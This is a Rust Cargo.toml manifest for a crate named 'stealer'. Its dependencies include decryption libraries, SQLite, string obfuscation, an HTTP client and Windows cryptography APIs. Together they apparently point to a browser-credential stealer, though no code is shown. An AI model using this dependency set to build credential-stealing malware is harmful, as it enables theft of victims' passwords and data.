[package]
name = "stealer"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
aes = "0.8.4"
aes-gcm = "0.10.3"
base64 = "0.22.1"
cbc = { version = "0.1.2", features = ["alloc"] }
der-parser = "9.0.0"
des = "0.8.1"
engine = "0.0.0"
hex = "0.4.3"
obfstr = "0.4.4"
reqwest = { version = "0.12.8", features = ["blocking"] }
ring = "0.17.8"
rusqlite = { version = "0.32.1", features = ["bundled"] }
serde = { version = "1.0.210", features = ["derive"] }
serde_json = "1.0.128"
sha1 = "0.10.6"
typenum = "1.17.0"
windows = { version = "0.58.0", features = ["Win32_Security_Cryptography", "Win32_System_SystemInformation"] }

